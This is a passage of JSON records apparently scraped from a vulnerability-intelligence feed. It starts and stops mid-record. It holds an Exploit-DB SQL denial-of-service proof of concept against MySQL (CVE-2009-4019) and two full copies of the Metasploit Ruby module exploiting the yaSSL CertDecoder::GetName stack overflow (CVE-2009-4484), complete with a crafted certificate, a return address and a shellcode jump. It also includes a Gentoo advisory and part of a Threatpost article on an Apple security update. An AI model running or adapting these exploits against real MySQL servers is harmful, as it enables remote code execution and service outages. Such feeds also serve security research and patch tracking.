"https://www.exploit-db.com/download/33398/"}, {"lastseen": "2016-02-03T19:06:33", "osvdbidlist": ["60488"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MySQL 6.0.9 SELECT Statement WHERE Clause Sub-query DoS. CVE-2009-4019. Dos exploit for linux platform", "reporter": "Shane Bester", "published": "2009-11-23T00:00:00", "type": "exploitdb", "title": "MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-11-23T00:00:00", "id": "EDB-ID:33397", "href": "https://www.exploit-db.com/exploits/33397/", "sourceData": "source: http://www.securityfocus.com/bid/37297/info\r\n\r\nMySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.\r\n\r\nAn attacker can exploit these issues to crash the application, denying access to legitimate users.\r\n\r\nVersions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. \r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`a` float);\r\ninsert into `t1` values (-2),(-1);\r\nselect 1 from `t1`\r\nwhere\r\n`a` <> '1' and not\r\nrow(`a`,`a`) <=>\r\nrow((select 1 from `t1` where 1=2),(select 1 from `t1`)) \r\ninto @`var0`;\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33397/"}, {"lastseen": "2016-02-02T06:39:54", "osvdbidlist": ["61956"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MySQL yaSSL CertDecoder::GetName Buffer Overflow. CVE-2009-4484. Remote exploit for linux platform", "reporter": "metasploit", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "MySQL yaSSL CertDecoder::GetName Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4484"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16850", "href": "https://www.exploit-db.com/exploits/16850/", "sourceData": "##\r\n# $Id: mysql_yassl_getname.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\r\n\t\t\t\timplementation bundled with MySQL. By sending a specially crafted\r\n\t\t\t\tclient certificate, an attacker can execute arbitrary code.\r\n\r\n\t\t\t\tThis vulnerability is present within the CertDecoder::GetName function inside\r\n\t\t\t\t\"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\r\n\t\t\t\twithin a parent function's stack frame.\r\n\r\n\t\t\t\tNOTE: This vulnerability requires a non-default configuration. First, the attacker\r\n\t\t\t\tmust be able to pass the host-based authentication. Next, the server must be\r\n\t\t\t\tconfigured to listen on an accessible network interface. Lastly, the server\r\n\t\t\t\tmust have been manually configured to use SSL.\r\n\r\n\t\t\t\tThe binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\r\n\t\t\t\ton Windows XP SP3, these protections successfully prevented exploitation.\r\n\r\n\t\t\t\tTesting was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\r\n\t\t\t\tpresent, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\r\n\t\t\t\tpackage were not exploitable due to the use of the compiler's FORTIFY feature.\r\n\r\n\t\t\t\tAlthough suse11 was mentioned in the original blog post, the binary package they\r\n\t\t\t\tprovide does not contain yaSSL or support SSL.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-4484' ],\r\n\t\t\t\t\t[ 'BID', '37640' ],\r\n\t\t\t\t\t[ 'BID', '37943' ],\r\n\t\t\t\t\t[ 'BID', '37974' ],\r\n\t\t\t\t\t[ 'OSVDB', '61956' ],\r\n\t\t\t\t\t[ 'URL', 'http://secunia.com/advisories/38344/' ],\r\n\t\t\t\t\t[ 'URL', 'http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1046,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'linux',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)', { 'JmpEsp' => 0x0807dc34 } ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 25 2010'))\r\n\r\n\t\tregister_options([ Opt::RPORT(3306) ], self)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# read the mysql server hello :)\r\n\t\tversion = nil\r\n\t\tif (buf = sock.get_once(-1, 5))\r\n\t\t\t#print_status(\"\\n\" + Rex::Text.to_hex_dump(buf))\r\n\t\t\tif (buf =~ /is not allowed to connect/)\r\n\t\t\t\traise RuntimeError, 'The server refused our connection!'\r\n\t\t\tend\r\n\r\n\t\t\tlen1,cmd = buf[0,5].unpack('VC')\r\n\t\t\trest = buf[5,len1]\r\n\t\t\tidx = rest.index(\"\\x00\")\r\n\t\t\tif (idx)\r\n\t\t\t\tversion = rest[0,idx]\r\n\t\t\t\tprint_status(\"Server reports version: #{version}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# handle automatic target selection\r\n\t\tmytarget = nil\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tprint_status(\"Attempting to locate a corresponding target\")\r\n\t\t\tversion = \"(\" + version + \")\"\r\n\t\t\ttargets.each { |tgt|\r\n\t\t\t\tif (tgt.name.include?(version))\r\n\t\t\t\t\tmytarget = tgt\r\n\t\t\t\tend\r\n\t\t\t}\r\n\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, 'Unable to detect target automatically'\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Using automatically detected target: #{mytarget.name}\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tmytarget = target\r\n\t\t\tprint_status(\"Trying target #{mytarget.name}...\")\r\n\t\tend\r\n\r\n\t\t# create/send the hello packet\r\n\t\thello = [0x01000020].pack('V')\r\n\t\thello << \"\\x85\\xae\\x03\\x00\"+\"\\x00\\x00\\x00\\x01\"+\"\\x08\\x00\\x00\\x00\"\r\n\t\thello << \"\\x00\" * 20\r\n\t\thello << \"\\x16\\x03\\x01\\x00\\x60\\x01\\x00\\x00\\x5c\\x03\\x01\\x4a\\x92\\xce\\xd1\\xe1\"\r\n\t\thello << \"\\xab\\x48\\x51\\xc8\\x49\\xa3\\x5e\\x97\\x1a\\xea\\xc2\\x99\\x82\\x33\\x42\\xd5\"\r\n\t\thello << \"\\x14\\xbc\\x05\\x64\\xdc\\xb5\\x48\\xbd\\x4c\\x11\\x55\\x00\\x00\\x34\\x00\\x39\"\r\n\t\thello << \"\\x00\\x38\\x00\\x35\\x00\\x16\\x00\\x13\\x00\\x0a\\x00\\x33\\x00\\x32\\x00\\x2f\"\r\n\t\thello << \"\\x00\\x66\\x00\\x05\\x00\\x04\\x00\\x63\\x00\\x62\\x00\\x61\\x00\\x15\\x00\\x12\"\r\n\t\thello << \"\\x00\\x09\\x00\\x65\\x00\\x64\\x00\\x60\\x00\\x14\\x00\\x11\\x00\\x08\\x00\\x06\"\r\n\t\thello << \"\\x00\\x03\\x02\\x01\\x00\"\r\n\t\tsock.put(hello)\r\n\r\n\r\n\t\t# build a cn that will trigger the vulnerability\r\n\t\tcn = rand_text(payload_space - payload.encoded.length)\r\n\t\tcn << payload.encoded\r\n\t\tcn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)\r\n\t\t# NOTE: x in above (also gets passed to free())\r\n\t\tpad = 1074 - payload_space\r\n\t\tcn << rand_text(pad)\r\n\t\tcn << [mytarget['JmpEsp']].pack('V')\r\n\t\tdistance = 4 + pad + 8 + payload.encoded.length\r\n\t\tcn << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\r\n\t\tcert = \"\\x2a\\x86\\x00\\x84\"\r\n\t\tcert << [cn.length].pack('N')\r\n\t\tcert << cn\r\n\t\tcert = \"\\x30\"+\r\n\t\t\t\"\\x82\\x01\\x01\"+\r\n\t\t\t\"\\x31\"+\r\n\t\t\t\"\\x82\\x01\\x01\"+\r\n\t\t\t\"\\x30\"+\r\n\t\t\t\"\\x82\\x01\\x01\"+\r\n\t\t\t\"\\x06\"+\r\n\t\t\t\"\\x82\\x00\\x02\" +\r\n\t\t\tcert\r\n\r\n\t\tcert = \"\\xa0\\x03\" +\r\n\t\t\t\"\\x02\\x01\\x02\" +\r\n\t\t\t\"\\x02\\x01\\x00\" +\r\n\t\t\t\"\\x30\" + \"\\x0d\" + \"\\x06\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x04\\x05\\x00\" +\r\n\t\t\tcert\r\n\r\n\t\t# wrap in 2 sequences\r\n\t\tcert = SNMP::BER.encode_tlv(0x30, cert)\r\n\t\tcert = SNMP::BER.encode_tlv(0x30, cert)\r\n\r\n\t\tcert1 = big_endian_24bit(cert.length) + cert\r\n\t\tcerts = big_endian_24bit(cert1.length) + cert1\r\n\r\n\t\thandshake = \"\\x0b\" + big_endian_24bit(certs.length) + certs\r\n\t\tmsg = \"\\x16\\x03\\x01\"\r\n\t\tmsg << [handshake.length].pack('n')\r\n\t\tmsg << handshake\r\n\r\n\t\tsock.put(msg)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\r\n\tdef big_endian_24bit(len)\r\n\t\tuno = (len >> 16) & 0xff\r\n\t\tdos = (len >> 8) & 0xff\r\n\t\ttre = len & 0xff\r\n\t\t[uno,dos,tre].pack('C*')\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16850/"}], "metasploit": [{"lastseen": "2018-09-21T16:26:03", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier) implementation bundled with MySQL. By sending a specially crafted client certificate, an attacker can execute arbitrary code. This vulnerability is present within the CertDecoder::GetName function inside \"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists within a parent function's stack frame. NOTE: This vulnerability requires a non-default configuration. First, the attacker must be able to pass the host-based authentication. Next, the server must be configured to listen on an accessible network interface. Lastly, the server must have been manually configured to use SSL. The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing on Windows XP SP3, these protections successfully prevented exploitation. Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary package were not exploitable due to the use of the compiler's FORTIFY feature. Although suse11 was mentioned in the original blog post, the binary package they provide does not contain yaSSL or support SSL.", "reporter": "Rapid7", "published": "2010-01-27T23:24:44", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/mysql/mysql_yassl_getname.rb", "type": "metasploit", "title": "MySQL yaSSL CertDecoder::GetName Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4484"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Good", "id": "MSF:EXPLOIT/LINUX/MYSQL/MYSQL_YASSL_GETNAME", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n implementation bundled with MySQL. By sending a specially crafted\n client certificate, an attacker can execute arbitrary code.\n\n This vulnerability is present within the CertDecoder::GetName function inside\n \"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n within a parent function's stack frame.\n\n NOTE: This vulnerability requires a non-default configuration. First, the attacker\n must be able to pass the host-based authentication. Next, the server must be\n configured to listen on an accessible network interface. Lastly, the server\n must have been manually configured to use SSL.\n\n The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\n on Windows XP SP3, these protections successfully prevented exploitation.\n\n Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n package were not exploitable due to the use of the compiler's FORTIFY feature.\n\n Although suse11 was mentioned in the original blog post, the binary package they\n provide does not contain yaSSL or support SSL.\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-4484' ],\n [ 'BID', '37640' ],\n [ 'BID', '37943' ],\n [ 'BID', '37974' ],\n [ 'OSVDB', '61956' ],\n [ 'URL', 'http://secunia.com/advisories/38344/' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 1046,\n 'BadChars' => \"\",\n 'StackAdjustment' => -3500,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)', { 'JmpEsp' => 0x0807dc34 } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 25 2010'))\n\n register_options([ Opt::RPORT(3306) ], self)\n end\n\n def exploit\n\n connect\n\n # read the mysql server hello :)\n version = nil\n if (buf = sock.get_once(-1, 5) || '')\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(buf))\n if (buf =~ /is not allowed to connect/)\n fail_with(Failure::Unreachable, 'The server refused our connection!')\n end\n\n len1,cmd = buf[0,5].unpack('VC')\n rest = buf[5,len1]\n idx = rest.index(\"\\x00\")\n if (idx)\n version = rest[0,idx]\n print_status(\"Server reports version: #{version}\")\n end\n end\n\n # handle automatic target selection\n mytarget = nil\n if (target.name =~ /Automatic/)\n print_status(\"Attempting to locate a corresponding target\")\n version = \"(\" + version + \")\"\n targets.each { |tgt|\n if (tgt.name.include?(version))\n mytarget = tgt\n end\n }\n\n if (not mytarget)\n fail_with(Failure::NoTarget, 'Unable to detect target automatically')\n else\n print_status(\"Using automatically detected target: #{mytarget.name}\")\n end\n else\n mytarget = target\n print_status(\"Trying target #{mytarget.name}...\")\n end\n\n # create/send the hello packet\n hello = [0x01000020].pack('V')\n hello << \"\\x85\\xae\\x03\\x00\"+\"\\x00\\x00\\x00\\x01\"+\"\\x08\\x00\\x00\\x00\"\n hello << \"\\x00\" * 20\n hello << \"\\x16\\x03\\x01\\x00\\x60\\x01\\x00\\x00\\x5c\\x03\\x01\\x4a\\x92\\xce\\xd1\\xe1\"\n hello << \"\\xab\\x48\\x51\\xc8\\x49\\xa3\\x5e\\x97\\x1a\\xea\\xc2\\x99\\x82\\x33\\x42\\xd5\"\n hello << \"\\x14\\xbc\\x05\\x64\\xdc\\xb5\\x48\\xbd\\x4c\\x11\\x55\\x00\\x00\\x34\\x00\\x39\"\n hello << \"\\x00\\x38\\x00\\x35\\x00\\x16\\x00\\x13\\x00\\x0a\\x00\\x33\\x00\\x32\\x00\\x2f\"\n hello << \"\\x00\\x66\\x00\\x05\\x00\\x04\\x00\\x63\\x00\\x62\\x00\\x61\\x00\\x15\\x00\\x12\"\n hello << \"\\x00\\x09\\x00\\x65\\x00\\x64\\x00\\x60\\x00\\x14\\x00\\x11\\x00\\x08\\x00\\x06\"\n hello << \"\\x00\\x03\\x02\\x01\\x00\"\n sock.put(hello)\n\n\n # build a cn that will trigger the vulnerability\n cn = rand_text(payload_space - payload.encoded.length)\n cn << payload.encoded\n cn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)\n # NOTE: x in above (also gets passed to free())\n pad = 1074 - payload_space\n cn << rand_text(pad)\n cn << [mytarget['JmpEsp']].pack('V')\n distance = 4 + pad + 8 + payload.encoded.length\n cn << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n\n cert = \"\\x2a\\x86\\x00\\x84\"\n cert << [cn.length].pack('N')\n cert << cn\n cert = \"\\x30\"+\n \"\\x82\\x01\\x01\"+\n \"\\x31\"+\n \"\\x82\\x01\\x01\"+\n \"\\x30\"+\n \"\\x82\\x01\\x01\"+\n \"\\x06\"+\n \"\\x82\\x00\\x02\" +\n cert\n\n cert = \"\\xa0\\x03\" +\n \"\\x02\\x01\\x02\" +\n \"\\x02\\x01\\x00\" +\n \"\\x30\" + \"\\x0d\" + \"\\x06\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x04\\x05\\x00\" +\n cert\n\n # wrap in 2 sequences\n cert = SNMP::BER.encode_tlv(0x30, cert)\n cert = SNMP::BER.encode_tlv(0x30, cert)\n\n cert1 = big_endian_24bit(cert.length) + cert\n certs = big_endian_24bit(cert1.length) + cert1\n\n handshake = \"\\x0b\" + big_endian_24bit(certs.length) + certs\n msg = \"\\x16\\x03\\x01\"\n msg << [handshake.length].pack('n')\n msg << handshake\n\n sock.put(msg)\n\n handler\n disconnect\n end\n\n\n def big_endian_24bit(len)\n uno = (len >> 16) & 0xff\n dos = (len >> 8) & 0xff\n tre = len & 0xff\n [uno,dos,tre].pack('C*')\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/mysql/mysql_yassl_getname.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:47:06", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3836", "https://bugs.gentoo.org/show_bug.cgi?id=294187", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3679", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3840", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1848", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3683", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3834", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3677", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3681", "https://bugs.gentoo.org/show_bug.cgi?id=240407", "https://bugs.gentoo.org/show_bug.cgi?id=351413", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1849", "https://bugs.gentoo.org/show_bug.cgi?id=277717", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3676", "https://bugs.gentoo.org/show_bug.cgi?id=238117", "https://bugs.gentoo.org/show_bug.cgi?id=220813", "https://bugs.gentoo.org/show_bug.cgi?id=344987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2008", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3963", "https://bugs.gentoo.org/show_bug.cgi?id=237166", "https://bugs.gentoo.org/show_bug.cgi?id=321791", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1850", "https://bugs.gentoo.org/show_bug.cgi?id=319489", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-7247", "https://bugs.gentoo.org/show_bug.cgi?id=229329", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3680", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3682", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4484", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2446", "https://bugs.gentoo.org/show_bug.cgi?id=339717", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4098", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3678", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4097", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3839", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4028", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4456", "https://bugs.gentoo.org/show_bug.cgi?id=303747", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4019", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1621", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1626", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3837", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3833"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "5.1.56", "packageName": "dev-db/mysql", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nMySQL is a popular open-source multi-threaded, multi-user SQL database server. \n\n### Description\n\nMultiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated remote attacker may be able to execute arbitrary code with the privileges of the MySQL process, cause a Denial of Service condition, bypass security restrictions, uninstall arbitrary MySQL plugins, or conduct Man-in-the-Middle and Cross-Site Scripting attacks. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MySQL users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mysql-5.1.56\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since May 14, 2011. It is likely that your system is already no longer affected by this issue.", "edition": 1, "reporter": "Gentoo Foundation", "published": "2012-01-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "gentoo", "title": "MySQL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2446", "CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2008-4456", "CVE-2010-3839", "CVE-2010-3835", "CVE-2008-4097", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-1621", "CVE-2009-4028", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-1626", "CVE-2008-4098", "CVE-2010-2008", "CVE-2010-3676", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2008-3963", "CVE-2010-1850", "CVE-2010-3834", "CVE-2010-3838", "CVE-2010-1848", "CVE-2008-7247", "CVE-2010-1849", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2012-01-05T00:00:00", "id": "GLSA-201201-02", "href": "https://security.gentoo.org/glsa/201201-02", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:08:12", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/apple-mega-patch-covers-88-mac-os-x-vulnerabilities-032910/", "http://support.apple.com/kb/HT4077", "site:http://www.apple.com/support/downloads/"], "description": "Apple Mega Patch Covers 88 Mac OS X Vulnerabilities\n\nApple today released one of its biggest Mac OS X security updates in recent memory, covering a whopping with fixes for 88 documented vulnerabilities.\n\nThe Mac OS X v10.6.3 update, which is considered \u201ccritical,\u201d covers flaws that could lead to remote code execution, information disclosure and denial-of-service attacks.\n\nSecurity Update 2010-002 / Mac OS X v10.6.3 is now available and\n\naddresses the following:\n\nAppKit\n\nCVE-ID: CVE-2010-0056\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Spell checking a maliciously crafted document may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow exists in the spell checking feature\n\nused by Cocoa applications. Spell checking a maliciously crafted\n\ndocument may lead to an unexpected application termination or\n\narbitrary code execution. This issue is addressed through improved\n\nbounds checking. This issue does not affect Mac OS X v10.6 systems.\n\nCredit: Apple.\n\nApplication Firewall\n\nCVE-ID: CVE-2009-2801\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Certain rules in the Application Firewall may become\n\ninactive after restart\n\nDescription: A timing issue in the Application Firewall may cause\n\ncertain rules to become inactive after reboot. The issue is addressed\n\nthrough improved handling of Firewall rules. This issue does not\n\naffect Mac OS X v10.6 systems. Credit to Michael Kisor of\n\nOrganicOrb.com for reporting this issue.\n\nAFP Server\n\nCVE-ID: CVE-2010-0057\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: When guest access is disabled, a remote user may be able to\n\nmount AFP shares as a guest\n\nDescription: An access control issue in AFP Server may allow a\n\nremote user to mount AFP shares as a guest, even if guest access is\n\ndisabled. This issue is addressed through improved access control\n\nchecks. Credit: Apple.\n\nAFP Server\n\nCVE-ID: CVE-2010-0533\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A remote user with guest access to an AFP share may access\n\nthe contents of world-readable files outside the Public share\n\nDescription: A directory traversal issue exists in the path\n\nvalidation for AFP shares. A remote user may enumerate the parent\n\ndirectory of the share root, and read or write files within that\n\ndirectory that are accessible to the \u2018nobody\u2019 user. This issue is\n\naddressed through improved handling of file paths. Credit to Patrik\n\nKarlsson of cqure.net for reporting this issue.\n\nApache\n\nCVE-ID: CVE-2009-3095\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may be able to bypass access control\n\nrestrictions\n\nDescription: An input validation issue exists in Apache\u2019s handling\n\nof proxied FTP requests. A remote attacker with the ability to issue\n\nrequests through the proxy may be able to bypass access control\n\nrestrictions specified in the Apache configuration. This issue is\n\naddressed by updating Apache to version 2.2.14.\n\nClamAV\n\nCVE-ID: CVE-2010-0058\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: ClamAV virus definitions may not receive updates\n\nDescription: A configuration issue introduced in Security Update\n\n2009-005 prevents freshclam from running. This may prevent virus\n\ndefinitions from being updated. This issue is addressed by updating\n\nfreshclam\u2019s launchd plist ProgramArguments key values. This issue\n\ndoes not affect Mac OS X v10.6 systems. Credit to Bayard Bell, Wil\n\nShipley of Delicious Monster, and David Ferrero of Zion Software, LLC\n\nfor reporting this issue.\n\nCoreAudio\n\nCVE-ID: CVE-2010-0059\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Playing maliciously crafted audio content may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue exists in the handling of\n\nQDM2 encoded audio content. Playing maliciously crafted audio content\n\nmay lead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed through improved bounds checking.\n\nCredit to an anonymous researcher working with TippingPoint\u2019s Zero\n\nDay Initiative for reporting this issue.\n\nCoreAudio\n\nCVE-ID: CVE-2010-0060\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Playing maliciously crafted audio content may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue exists in the handling of\n\nQDMC encoded audio content. Playing maliciously crafted audio content\n\nmay lead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed through improved bounds checking.\n\nCredit to an anonymous researcher working with TippingPoint\u2019s Zero\n\nDay Initiative for reporting this issue.\n\nCoreMedia\n\nCVE-ID: CVE-2010-0062\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow exists in CoreMedia\u2019s 